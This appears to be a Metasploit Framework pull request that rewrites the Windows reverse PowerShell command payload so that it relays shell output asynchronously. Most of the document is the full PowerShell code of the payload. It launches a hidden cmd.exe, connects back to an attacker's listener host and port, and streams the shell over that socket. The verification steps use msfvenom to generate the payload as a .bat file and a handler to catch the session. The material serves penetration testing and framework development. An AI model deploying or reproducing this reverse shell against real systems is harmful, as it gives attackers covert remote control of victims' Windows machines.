### PR TITLE
fix the cmd/windows/reverse_powershell payload

### DIFF
--- a/modules/payloads/singles/cmd/windows/reverse_powershell.rb
+++ b/modules/payloads/singles/cmd/windows/reverse_powershell.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 1228
+  CachedSize = 1481
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
@@ -57,45 +57,57 @@ module MetasploitModule
   def command_string
     lhost = datastore['LHOST']
     lport = datastore['LPORT']
-    powershell = "function RSC{"\
-          "if ($c.Connected -eq $true) {$c.Close()};"\
-          "if ($p.ExitCode -ne $null) {$p.Close()};"\
-          "exit;"\
-        "};"\
-        "$a='#{lhost}';$p='#{lport}';$c=New-Object system.net.sockets.tcpclient;"\
-        "$c.connect($a,$p);$s=$c.GetStream();"\
-        "$nb=New-Object System.Byte[] $c.ReceiveBufferSize;"\
-        "$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';"\
-        "$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;"\
-        "$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;"\
-        "$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;"\
-        "while($os.Peek() -ne -1){"\
-          "$o += $e.GetString($os.Read())"\
-        "};"\
-        "$s.Write($e.GetBytes($o),0,$o.Length);"\
-        "$o=$null;$d=$false;$t=0;"\
-        "while (-not $d) {"\
-          "if ($c.Connected -ne $true) {RSC};"\
-          "$pos=0;$i=1; "\
-          "while (($i -gt 0) -and ($pos -lt $nb.Length)) {"\
-            "$r=$s.Read($nb,$pos,$nb.Length - $pos);"\
-            "$pos+=$r;"\
-            "if (-not $pos -or $pos -eq 0) {RSC};"\
-            "if ($nb[0..$($pos-1)] -contains 10) {break}};"\
-            "if ($pos -gt 0){"\
-              "$str=$e.GetString($nb,0,$pos);"\
-              "$is.write($str);start-sleep 1;"\
-              "if ($p.ExitCode -ne $null){RSC}else{"\
-                "$o=$e.GetString($os.Read());"\
-                "while($os.Peek() -ne -1){"\
-                  "$o += $e.GetString($os.Read());"\
-                  "if ($o -eq $str) {$o=''}"\
-                "};"\
-                "$s.Write($e.GetBytes($o),0,$o.length);"\
-                "$o=$null;"\
-                "$str=$null"\
-              "}"\
-            "}else{RSC}};"\
+    powershell = %Q^
+$a='#{lhost}';
+$b=#{lport};
+$c=New-Object system.net.sockets.tcpclient;
+$nb=New-Object System.Byte[] $c.ReceiveBufferSize;
+$ob=New-Object System.Byte[] 65536;
+$eb=New-Object System.Byte[] 65536;
+$e=new-object System.Text.UTF8Encoding;
+$p=New-Object System.Diagnostics.Process;
+$p.StartInfo.FileName='cmd.exe';
+$p.StartInfo.RedirectStandardInput=1;
+$p.StartInfo.RedirectStandardOutput=1;
+$p.StartInfo.RedirectStandardError=1;
+$p.StartInfo.UseShellExecute=0;
+$q=$p.Start();
+$is=$p.StandardInput;
+$os=$p.StandardOutput;
+$es=$p.StandardError;
+$osread=$os.BaseStream.ReadAsync($ob, 0, $ob.Length);
+$esread=$es.BaseStream.ReadAsync($eb, 0, $eb.Length);
+$c.connect($a,$b);
+$s=$c.GetStream();
+while ($true) {
+    start-sleep -m 100;
+    if ($osread.IsCompleted -and $osread.Result -ne 0) {
+      $s.Write($ob,0,$osread.Result);
+      $s.Flush();
+      $osread = $os.BaseStream.ReadAsync($ob, 0, $ob.Length);
+    }
+    if ($esread.IsCompleted -and $esread.Result -ne 0) {
+      $s.Write($eb,0,$esread.Result);
+      $s.Flush();
+      $esread = $es.BaseStream.ReadAsync($eb, 0, $eb.Length);
+    }
+    if ($s.DataAvailable) {
+      $r=$s.Read($nb,0,$nb.Length);
+      if ($r -lt 1) {
+          break;
+      } else {
+          $str=$e.GetString($nb,0,$r);
+          $is.write($str);
+      }
+    }
+    if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) {
+        break;
+    };
+    if ($p.ExitCode -ne $null) {
+        break;
+    };
+};
+^.gsub!("\n", "")
 
     "powershell -w hidden -nop -c #{powershell}"
   end

--- a/modules/payloads/singles/cmd/windows/reverse_powershell.rb
+++ b/modules/payloads/singles/cmd/windows/reverse_powershell.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 1481
+  CachedSize = 1588
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
@@ -75,21 +75,23 @@ $q=$p.Start();
 $is=$p.StandardInput;
 $os=$p.StandardOutput;
 $es=$p.StandardError;
-$osread=$os.BaseStream.ReadAsync($ob, 0, $ob.Length);
-$esread=$es.BaseStream.ReadAsync($eb, 0, $eb.Length);
+$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);
+$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);
 $c.connect($a,$b);
 $s=$c.GetStream();
 while ($true) {
     start-sleep -m 100;
     if ($osread.IsCompleted -and $osread.Result -ne 0) {
-      $s.Write($ob,0,$osread.Result);
+      $r=$os.BaseStream.EndRead($osread);
+      $s.Write($ob,0,$r);
       $s.Flush();
-      $osread = $os.BaseStream.ReadAsync($ob, 0, $ob.Length);
+      $osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);
     }
     if ($esread.IsCompleted -and $esread.Result -ne 0) {
-      $s.Write($eb,0,$esread.Result);
+      $r=$es.BaseStream.EndRead($esread);
+      $s.Write($eb,0,$r);
       $s.Flush();
-      $esread = $es.BaseStream.ReadAsync($eb, 0, $eb.Length);
+      $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);
     }
     if ($s.DataAvailable) {
       $r=$s.Read($nb,0,$nb.Length);
@@ -102,11 +104,11 @@ while ($true) {
     }
     if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) {
         break;
-    };
+    }
     if ($p.ExitCode -ne $null) {
         break;
-    };
-};
+    }
+}
 ^.gsub!("\n", "")
 
     "powershell -w hidden -nop -c #{powershell}"


### PR DESCRIPTION
This pull request fixes the cmd/windows/reverse_powershell payload so that it can pass output data to the socket asynchronously. This is similar to https://github.com/rapid7/metasploit-framework/pull/12945 but with a fix for Windows 7: https://github.com/rapid7/metasploit-framework/commit/fc1f4936ac6817680ecc50e74460ca10ba9cba4f

Fixes https://github.com/rapid7/metasploit-framework/issues/12579
Ping @bcoles 

## Verification

- [ ] Ensure cmd_exec tests pass:
```
use exploit/multi/handler
set LHOST 192.168.56.1
set LPORT 4444
set ExitOnSession false
set payload cmd/windows/reverse_powershell
run -jz

# Get a session on Windows:
# msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.56.1 LPORT=4444 -o powershell.bat 

loadpath test/modules
use post/test/cmd_exec
set SESSION -1
set VERBOSE true
run
```

- [ ] Ensure `session -u 1` works now
- [ ] Check the payload is still stable (e.g no 100% cpu usage, killing cmd.exe kills the session, killing the socket kills cmd.exe, etc)
